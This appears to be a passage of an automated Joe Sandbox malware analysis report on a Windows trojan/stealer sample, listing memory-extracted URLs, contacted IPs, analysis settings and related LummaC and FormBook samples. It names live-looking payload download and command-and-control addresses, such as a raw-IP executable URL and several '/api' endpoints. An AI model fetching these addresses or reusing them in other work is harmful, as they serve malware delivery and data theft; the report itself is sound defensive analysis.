https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l	2889.tmp.exe, 00000003.00000003.1592449873.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589045882.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1591156418.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1590829218.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1590345520.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589222433.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589995362.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1592346396.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1591915371.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589570443.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000002.1792386987.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1588592421.000000000083C000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://soundtappysk.shop/p	2889.tmp.exe, 00000003.00000003.1364127657.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/subscriber_agreement/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://soundtappysk.shop/x	2889.tmp.exe, 00000003.00000003.1364127657.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exe	b0cQukXPAl.exe, b0cQukXPAl.exe, 00000000.00000002.3754266526.0000000000633000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.1351206300.0000000000667000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000002.3754266526.0000000000667000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.3623729070.0000000000667000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.3623729070.0000000000633000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.1351206300.0000000000660000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE	b0cQukXPAl.exe, 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.yru	2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	2889.tmp.exe, 00000003.00000003.1592449873.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589045882.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1591156418.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1590829218.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1590345520.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589222433.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589995362.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1592346396.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1591915371.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589570443.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000002.1792386987.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1588592421.000000000083C000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steamp	2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/track_prt.php?sub=&cc=DE	b0cQukXPAl.exe, 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/p4	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://skidjazzyric.click/api	2889.tmp.exe, 00000003.00000003.1364088273.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1364309494.00000000007CC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	2889.tmp.exe, 00000003.00000003.1571581901.0000000003148000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/cssB	2889.tmp.exe, 00000003.00000003.1592449873.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589045882.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1591156418.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1590829218.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1590345520.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589222433.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589995362.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1592346396.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1591915371.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1589570443.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000002.1792386987.000000000083D000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1588592421.000000000083C000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/	2889.tmp.exe, 00000003.00000003.1588592421.000000000083C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=	b0cQukXPAl.exe	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/	b0cQukXPAl.exe, 00000000.00000002.3754266526.0000000000633000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.3623729070.0000000000633000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/about/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fas	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://soundtappysk.shop/	2889.tmp.exe, 00000003.00000003.1364127657.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://soundtappysk.shop/api	2889.tmp.exe, 00000003.00000003.1364127657.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://store.steampowered.com/subscriber_agreement/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	2889.tmp.exe, 00000003.00000003.1569555588.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/tps:fu	2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com:443/api	2889.tmp.exe, 00000003.00000003.1588078891.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1588859949.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1588419672.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/workshop/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	2889.tmp.exe, 00000003.00000003.1571581901.0000000003148000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.coNu5	2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://soundtappysk.shop:443/api	2889.tmp.exe, 00000003.00000003.1364088273.00000000007D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalConter	2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.96.1	sputnik-1985.com	United States	13335	CLOUDFLARENETUS	false
104.21.56.70	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588997
Start date and time:	2025-01-11 08:10:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	b0cQukXPAl.exe renamed because original name is a hash value
Original Sample Name:	9fc816bb0cbe07f412d1dda6feedb96f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/7@13/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 92% Number of executed functions: 28 Number of non-executed functions: 208
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 13.107.246.45, 4.175.87.197, 20.242.39.171, 40.126.32.138, 172.202.163.200, 20.190.159.4
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 2889.tmp.exe, PID 7940 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:11:13	API Interceptor	8814209x Sleep call for process: b0cQukXPAl.exe modified
02:11:16	API Interceptor	7x Sleep call for process: 2889.tmp.exe modified
02:11:59	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.96.1	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	www.uzshou.world/kbd2/?EtJTX=_JVX4ryxDRQpLJF&cNPH=ufZ7RYF4yLxNXVSq5Vx/4TYieRbcnKjskkbM3L5RbgB1pAgqHA7sfCNkYWLyXRMMwBB3JLbYKUw1FAOWml6VLpxPVZ4qXf58MsNUIQgw/PJ5HUGIvLQvrl5frN9PrRFpPiAd2cDcH6Sr
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/58m5/
	EIvidclKOb.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/0pqe/
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	www.aonline.top/fqlg/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
104.21.56.70	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse
	xCnwCctDWC.exe	Get hash	malicious	LummaC	Browse
	DLKs2Qeljg.exe	Get hash	malicious	LummaC	Browse
	Ljrprfl3BH.exe	Get hash	malicious	LummaC	Browse
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse
	K27Yg4V48M.exe	Get hash	malicious	LummaC	Browse
	IH5XqCdf06.exe	Get hash	malicious	LummaC	Browse
	J18zxRjOes.exe	Get hash	malicious	LummaC	Browse
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sputnik-1985.com	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	HouseholdsClicking.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	FeedStation.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	fghj.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
steamcommunity.com	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	HouseholdsClicking.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	davies.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	FeedStation.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
post-to-me.com	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	xCnwCctDWC.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
